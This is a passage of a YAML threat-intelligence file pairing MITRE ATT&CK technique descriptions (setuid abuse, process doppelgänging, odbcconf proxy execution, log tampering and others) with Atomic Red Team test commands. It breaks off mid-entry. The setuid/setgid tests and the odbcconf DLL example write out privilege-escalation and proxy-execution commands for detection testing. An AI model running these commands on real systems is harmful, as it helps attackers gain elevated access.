description: ReasonLabs. (n.d.). What is Dead code insertion?. Retrieved March 4, 2025. url: https://cyberpedia.reasonlabs.com/EN/dead%20code%20insertion.html - source_name: ReasonLabs Cyberpedia Junk Code description: What is Junk Code?. (n.d.). ReasonLabs. Retrieved April 4, 2025. url: https://cyberpedia.reasonlabs.com/EN/junk%20code.html object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T19:58:37.495Z' name: Junk Code Insertion description: "Adversaries may use junk code / dead code to obfuscate a malware’s functionality. Junk code is code that either does not execute, or if it does execute, does not change the functionality of the code. Junk code makes analysis more difficult and time-consuming, as the analyst steps through non-functional code instead of analyzing the main code. It also may hinder detections that rely on static code analysis due to the use of benign functionality, especially when combined with [Compression](https://attack.mitre.org/techniques/T1027/015) or [Software Packing](https://attack.mitre.org/techniques/T1027/002).(Citation: ReasonLabs)(Citation: ReasonLabs Cyberpedia Junk Code)\n\nNo-Operation (NOP) instructions are an example of dead code commonly used in x86 assembly language. They are commonly used as the 0x90 opcode. When NOPs are added to malware, the disassembler may show the NOP instructions, leading to the analyst needing to step through them.(Citation: ReasonLabs)\n\nThe use of junk / dead code insertion is distinct from [Binary Padding](https://attack.mitre.org/techniques/T1027/001) because the purpose is to obfuscate the functionality of the code, rather than simply to change the malware’s signature. " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Joas Antonio dos Santos, @C0d3Cr4zy x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.0' atomic_tests: [] T1548: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b created: '2020-01-30T13:58:14.373Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1548 external_id: T1548 - source_name: TechNet How UAC Works description: Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016. url: https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works - source_name: OSX Keydnap malware description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017. url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ - source_name: Fortinet Fareit description: Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016. url: https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware - source_name: sudo man page 2018 description: Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018. url: https://www.sudo.ws/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:53.277Z' name: Abuse Elevation Control Mechanism description: 'Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk.(Citation: TechNet How UAC Works)(Citation: sudo man page 2018) An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.(Citation: OSX Keydnap malware)(Citation: Fortinet Fareit)' kill_chain_phases: - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows - IaaS - Office Suite - Identity Provider x_mitre_version: '1.5' atomic_tests: [] T1134.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf created: '2020-02-18T16:48:56.582Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1134/002 external_id: T1134.002 - source_name: Microsoft Command-line Logging description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017. url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing - source_name: Microsoft RunAs description: Microsoft. (2016, August 31). Runas. Retrieved October 1, 2021. url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11) object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:53.370Z' name: Create Process with Token description: |- Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.(Citation: Microsoft RunAs) Creating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or created via [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) before being used to create a process. While this technique is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001), the techniques can be used in conjunction where a token is duplicated and then used to create a new process. kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Vadim Khrykov - Jonny Johnson x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.3' identifier: T1134.002 atomic_tests: [] T1548.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9 created: '2020-01-30T14:11:41.212Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1548/001 external_id: T1548.001 - source_name: GTFOBins Suid description: Emilio Pinna, Andrea Cardaci. (n.d.). GTFOBins. Retrieved January 28, 2022. url: https://gtfobins.github.io/#+suid - source_name: OSX Keydnap malware description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017. url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ - source_name: setuid man page description: Michael Kerrisk. (2017, September 15). Linux Programmer's Manual. Retrieved September 21, 2018. url: http://man7.org/linux/man-pages/man2/setuid.2.html object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:53.456Z' name: 'Abuse Elevation Control Mechanism: Setuid and Setgid' description: |- An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The chmod command can set these bits with bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. This will enable the setuid bit. To enable the setgid bit, chmod 2775 and chmod g+s can be used. Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a "shell escape" or other actions to bypass an execution environment with restricted permissions. Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The find command can also be used to search for such files. For example, find / -perm +4000 2>/dev/null can be used to find files with setuid set and find / -perm +2000 2>/dev/null may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS x_mitre_version: '1.2' identifier: T1548.001 atomic_tests: - name: Make and modify binary from C source auto_generated_guid: 896dfe97-ae43-4101-8e96-9a7996555d80 description: 'Make, change owner, and change file attributes on a C source code file ' supported_platforms: - macos - linux input_arguments: payload: description: hello.c payload type: path default: PathToAtomicsFolder/T1548.001/src/hello.c executor: command: | cp #{payload} /tmp/hello.c sudo chown root /tmp/hello.c sudo make /tmp/hello sudo chown root /tmp/hello sudo chmod u+s /tmp/hello /tmp/hello cleanup_command: | sudo rm /tmp/hello sudo rm /tmp/hello.c name: sh elevation_required: true - name: Set a SetUID flag on file auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in FreeBSD. ' supported_platforms: - macos - linux input_arguments: file_to_setuid: description: Path of file to set SetUID flag type: path default: "/tmp/evilBinary" executor: command: | sudo touch #{file_to_setuid} sudo chown root #{file_to_setuid} sudo chmod u+xs #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} ' name: sh elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. ' supported_platforms: - macos - linux input_arguments: file_to_setuid: description: Path of file to set SetGID flag type: path default: "/tmp/evilBinary" executor: command: | sudo touch #{file_to_setuid} sudo chown root #{file_to_setuid} sudo chmod g+xs #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} ' name: sh elevation_required: true T1218.008: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071 created: '2020-01-24T15:01:32.917Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1218/008 external_id: T1218.008 - source_name: Microsoft odbcconf.exe description: Microsoft. (2017, January 18). ODBCCONF.EXE. Retrieved March 7, 2019. url: https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017 - source_name: LOLBAS Odbcconf description: LOLBAS. (n.d.). Odbcconf.exe. Retrieved March 7, 2019. url: https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ - source_name: TrendMicro Squiblydoo Aug 2017 description: Bermejo, L., Giagone, R., Wu, R., and Yarochkin, F. (2017, August 7). Backdoor-carrying Emails Set Sights on Russian-speaking Businesses. Retrieved March 7, 2019. url: https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/ - source_name: TrendMicro Cobalt Group Nov 2017 description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November 20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit Against Russian Banks. Retrieved March 7, 2019.' url: https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:55.622Z' name: 'Signed Binary Proxy Execution: Odbcconf' description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft.\n\nAdversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) \n" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.1' identifier: T1218.008 atomic_tests: [] T1548.005: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--6fa224c7-5091-4595-bf15-3fc9fe2f2c7c created: '2023-07-10T16:37:15.672Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1548/005 external_id: T1548.005 - source_name: AWS PassRole description: AWS. (n.d.). Granting a user permissions to pass a role to an AWS service. Retrieved July 10, 2023. url: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html - source_name: CrowdStrike StellarParticle January 2022 description: 'CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.' url: https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/ - source_name: Google Cloud Just in Time Access 2023 description: Google Cloud. (n.d.). Manage just-in-time privileged access to projects. Retrieved September 21, 2023. url: https://cloud.google.com/architecture/manage-just-in-time-privileged-access-to-project - source_name: Google Cloud Service Account Authentication Roles description: Google Cloud. (n.d.). Roles for service account authentication. Retrieved July 10, 2023. url: https://cloud.google.com/iam/docs/service-account-permissions - source_name: Microsoft Impersonation and EWS in Exchange description: Microsoft. (2022, September 13). Impersonation and EWS in Exchange. Retrieved July 10, 2023. url: https://learn.microsoft.com/en-us/exchange/client-developer/exchange-web-services/impersonation-and-ews-in-exchange - source_name: Azure Just in Time Access 2023 description: Microsoft. (2023, August 29). Configure and approve just-in-time access for Azure Managed Applications. Retrieved September 21, 2023. url: https://learn.microsoft.com/en-us/azure/azure-resource-manager/managed-applications/approve-just-in-time-access - source_name: Rhino Security Labs AWS Privilege Escalation description: Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation – Methods and Mitigation. Retrieved May 27, 2022. url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ - source_name: Rhino Google Cloud Privilege Escalation description: Spencer Gietzen. (n.d.). Privilege Escalation in Google Cloud Platform – Part 1 (IAM). Retrieved September 21, 2023. url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ - source_name: Hunters Domain Wide Delegation Google Workspace 2023 description: 'Yonatan Khanashvilli. (2023, November 28). DeleFriend: Severe design flaw in Domain Wide Delegation could leave Google Workspace vulnerable for takeover. Retrieved January 16, 2024.' url: https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover - source_name: Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023 description: Zohar Zigdon. (2023, November 30). Exploring a Critical Risk in Google Workspace's Domain-Wide Delegation Feature. Retrieved January 16, 2024. url: https://unit42.paloaltonetworks.com/critical-risk-in-google-workspace-delegation-feature/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T23:15:17.608Z' name: Temporary Elevated Cloud Access description: "Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own. \n\nJust-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.(Citation: Azure Just in Time Access 2023)\n\nAccount impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the `iam.serviceAccountTokenCreator` role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account, while service accounts with domain-wide delegation permission are permitted to impersonate Google Workspace accounts.(Citation: Google Cloud Service Account Authentication Roles)(Citation: Hunters Domain Wide Delegation Google Workspace 2023)(Citation: Google Cloud Just in Time Access 2023)(Citation: Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023) In Exchange Online, the `ApplicationImpersonation` role allows a service account to use the permissions associated with specified user accounts.(Citation: Microsoft Impersonation and EWS in Exchange) \n\nMany cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the `PassRole` permission can allow a service they create to assume a given role, while in GCP, users with the `iam.serviceAccountUser` role can attach a service account to a resource.(Citation: AWS PassRole)(Citation: Google Cloud Service Account Authentication Roles)\n\nWhile users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.(Citation: Rhino Google Cloud Privilege Escalation)(Citation: Rhino Security Labs AWS Privilege Escalation)\n\n**Note:** this technique is distinct from [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003), which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.(Citation: CrowdStrike StellarParticle January 2022)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Arad Inbar, Fidelis Security x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - IaaS - Office Suite - Identity Provider x_mitre_version: '1.2' atomic_tests: [] T1055.013: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197 created: '2020-01-14T17:19:50.978Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1055/013 external_id: T1055.013 - source_name: Microsoft TxF description: Microsoft. (n.d.). Transactional NTFS (TxF). Retrieved December 20, 2017. url: https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx - source_name: Microsoft Basic TxF Concepts description: Microsoft. (n.d.). Basic TxF Concepts. Retrieved December 20, 2017. url: https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx - source_name: Microsoft Where to use TxF description: Microsoft. (n.d.). When to Use Transactional NTFS. Retrieved December 20, 2017. url: https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx - source_name: BlackHat Process Doppelgänging Dec 2017 description: 'Liberman, T. & Kogan, E. (2017, December 7). Lost in Transaction: Process Doppelgänging. Retrieved December 20, 2017.' url: https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf - source_name: hasherezade Process Doppelgänging Dec 2017 description: hasherezade. (2017, December 18). Process Doppelgänging – a new way to impersonate a process. Retrieved December 20, 2017. url: https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/ - source_name: Microsoft PsSetCreateProcessNotifyRoutine routine description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved December 20, 2017. url: https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:56.422Z' name: Process Doppelgänging description: "Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. \n\nWindows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)\n\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nAdversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nProcess Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):\n\n* Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.\n* Load – Create a shared section of memory and load the malicious executable.\n* Rollback – Undo changes to original executable, effectively removing malicious code from the file system.\n* Animate – Create a process from the tainted section of memory and initiate execution.\n\nThis behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process. " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.1' atomic_tests: [] T1578.003: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4 created: '2020-06-16T17:23:06.508Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1578/003 external_id: T1578.003 - source_name: AWS CloudTrail Search description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances. Retrieved June 17, 2020. url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/ - source_name: Cloud Audit Logs description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020. url: https://cloud.google.com/logging/docs/audit#admin-activity - source_name: Mandiant M-Trends 2020 description: Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024. url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf - source_name: Azure Activity Logs description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17, 2020. url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:56.705Z' name: Delete Cloud Instance description: |- An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable. An adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Arun Seelagan, CISA x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - IaaS x_mitre_version: '1.2' atomic_tests: [] T1574.005: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--70d81154-b187-45f9-8ec5-295d01255979 created: '2020-03-13T11:12:18.558Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1574/005 external_id: T1574.005 - source_name: mozilla_sec_adv_2012 description: Robert Kugler. (2012, November 20). Mozilla Foundation Security Advisory 2012-98. Retrieved March 10, 2017. url: https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/ - source_name: Executable Installers are Vulnerable description: 'Stefan Kanthak. (2015, December 8). Executable installers are vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation of privilege. Retrieved December 4, 2014.' url: https://seclists.org/fulldisclosure/2015/Dec/34 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:56.875Z' name: Executable Installer File Permissions Weakness description: |- Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL](https://attack.mitre.org/techniques/T1574/001) search order hijacking. Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Travis Smith, Tripwire - Stefan Kanthak x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.1' atomic_tests: [] T1562.006: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da created: '2020-03-19T19:09:30.329Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1562/006 external_id: T1562.006 - source_name: Google Cloud Threat Intelligence ESXi VIBs 2022 description: 'Alexander Marvi, Jeremy Koppen, Tufail Ahmed, and Jonathan Lepore. (2022, September 29). Bad VIB(E)s Part One: Investigating Novel Malware Persistence Within ESXi Hypervisors. Retrieved March 26, 2025.' url: https://cloud.google.com/blog/topics/threat-intelligence/esxi-hypervisors-malware-persistence - source_name: Broadcom Configuring syslog on ESXi description: Broadcom. (n.d.). Configuring syslog on ESXi. Retrieved March 27, 2025. url: https://knowledge.broadcom.com/external/article/318939/configuring-syslog-on-esxi.html - source_name: disable_win_evt_logging description: 'Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.' url: https://ptylu.github.io/content/report/report.html?report=25 - source_name: LemonDuck description: Manoj Ahuje. (2022, April 21). LemonDuck Targets Docker for Cryptomining Operations. Retrieved June 30, 2022. url: https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/ - source_name: Microsoft Lamin Sept 2017 description: Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved September 6, 2018. url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A - source_name: Microsoft About Event Tracing 2018 description: Microsoft. (2018, May 30). About Event Tracing. Retrieved June 7, 2019. url: https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events - source_name: Medium Event Tracing Tampering 2018 description: 'Palantir. (2018, December 24). Tampering with Windows Event Tracing: Background, Offense, and Defense. Retrieved June 7, 2019.' url: https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:57.704Z' name: 'Impair Defenses: Indicator Blocking' description: "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event 